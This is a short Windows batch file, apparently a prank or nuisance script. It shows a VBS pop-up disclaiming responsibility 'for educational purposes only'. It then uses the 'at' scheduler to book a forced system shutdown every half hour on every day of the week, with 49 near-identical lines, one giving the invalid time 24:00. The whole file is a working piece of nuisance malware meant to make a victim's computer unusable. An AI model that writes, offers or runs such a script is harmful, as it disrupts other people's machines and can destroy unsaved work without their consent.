@echo off
echo x=msgbox("All files here are to be used for educational purposes only. Use all files as is; any modifications in any way immediatly deem them as no longer our responsibility. Any lawful action taken against individuals or an organization from use/distribution of these files is not our responsibility regardless of files edits or lack thereof (after posted publish date)." ,16, "WARNING") >> msgbox.vbs
start msgbox.vbs
pause
at 0:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 0:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 1:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 1:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 2:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 2:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 3:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 3:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 4:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 4:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 5:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 5:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 6:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 6:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 7:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 7:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 8:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 8:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 9:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 9:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 10:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 10:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 11:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 11:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 12:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 12:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 13:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 13:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 14:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 14:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 15:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 15:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 16:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 16:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 17:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 17:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 18:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 18:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 19:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 19:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 20:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 20:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 21:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 21:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 22:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 22:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 23:00 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 23:30 every:m,t,w,th,f,sa,s shutdown -s -t 5
at 24:00 every:m,t,w,th,f,sa,s shutdown -s -t 5